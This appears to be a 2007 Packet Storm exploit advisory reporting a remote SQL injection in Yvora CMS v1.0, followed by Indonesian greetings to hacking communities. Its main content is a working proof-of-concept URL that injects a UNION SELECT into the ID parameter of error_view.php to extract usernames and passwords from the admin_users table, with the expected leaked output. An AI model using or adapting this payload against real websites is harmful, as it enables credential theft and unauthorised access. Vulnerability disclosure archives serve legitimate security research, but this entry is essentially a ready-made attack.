yvoracms-sql.txt

2007-09-05T00:00:00
ID PACKETSTORM:59042
Type packetstorm
Reporter k1tk4t
Modified 2007-09-05T00:00:00

Description

                                        
                                            `########################################################################  
# Yvora CMS v1.0 - Remote SQL Injection  
# Vendor : http://www.yvora.nl/  
# Found By : k1tk4t - k1tk4t[4t]newhack.org  
# Location : Indonesia -- #newhack[dot]org @irc.dal.net  
########################################################################  
POC;  
  
http://www.victim.xxx/error_view.php?ID=[SQL]  
  
Contoh;  
  
http://www.victim.xxx/error_view.php?ID=-99+UNION+SELECT+1,2,3,password,username,6,7+from+admin_users/*  
  
Hasil;  
  
Error: Username  
Query: Password  
  
########################################################################  
Terimakasih untuk;  
str0ke  
DNX,xoron,iFX,x-ace,nyubi,selikoer,k1ngk0ng  
dan semua temen2 komunitas security&hacking  
-----------------------  
-newhack[dot]org|staff-  
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX  
-----------------------  
all member newhack[dot]org  
-----------------------  
all member www.echo.or.id  
-----------------------  
all member www.yogyafree.net  
-----------------------  
all member www.sekuritionline.net  
-----------------------  
all member www.kecoak-elektronik.net  
-----------------------  
semua komunitas hacker&security Indonesia  
Cintailah Bahasa Indonesia  
  
`